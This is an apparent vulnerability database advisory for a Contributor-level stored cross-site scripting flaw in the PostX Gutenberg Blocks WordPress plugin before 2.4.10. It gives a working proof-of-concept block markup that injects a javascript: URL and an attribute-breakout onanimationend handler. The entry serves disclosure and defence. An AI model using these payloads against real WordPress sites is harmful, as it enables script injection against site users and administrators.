WordPress Plugin Vulnerabilities
PostX Gutenberg Blocks for Post Grid < 2.4.10 - Contributor+ Stored Cross-Site Scripting
Description
The plugin allows users with a role as low as Contributor to perform Stored Cross-Site Scripting attacks via the plugin's block.
Proof of Concept
PoC can be entered with code editor the example below uses Taxonomy block; all blocks are vulnerable: <!-- wp:ultimate-post/ultp-taxonomy {"blockId":"767f9c","headingURL":"javascript:alert(origin)","counterBgColor":{"openColor":1,"type":"color","color":"","gradient":{"color1":"#16d03e","color2":"#1f91f3","type":"linear","direction":"90","start":5,"stop":80,"radial":"center","clip":false},"clip":false},"counterBorder":{"width":{"top":1,"right":1,"bottom":1,"left":1},"type":"solid","color":"#009fd4","openBorder":0},"contentWrapBorder":{"width":{"top":1,"right":1,"bottom":1,"left":1},"type":"solid","color":"#009fd4","openBorder":0},"contentWrapShadow":{"inset":"","width":{"top":1,"right":1,"bottom":1,"left":1},"color":"#009fd4","openShadow":0},"wrapBg":{"openColor":0,"type":"color","color":"#f5f5f5","gradient":{"color1":"#16d03e","color2":"#1f91f3","type":"linear","direction":"90","start":5,"stop":80,"radial":"center","clip":false},"clip":false},"wrapBorder":{"width":{"top":1,"right":1,"bottom":1,"left":1},"type":"solid","color":"#009fd4","openBorder":0},"wrapShadow":{"inset":"","width":{"top":1,"right":1,"bottom":1,"left":1},"color":"#009fd4","openShadow":0},"advanceId":"\u0022 style=\u0022animation-name:twentytwentyone-close-button-transition\u0022 onanimationend=\u0022alert(origin)//"} /-->
Affects Plugins
References
CVE
Classification
Type
XSS
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
apple502j
Submitter
apple502j
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2021-08-26 (about 2 years ago)
Added
2021-08-26 (about 2 years ago)
Last Updated
2022-04-11 (about 2 years ago)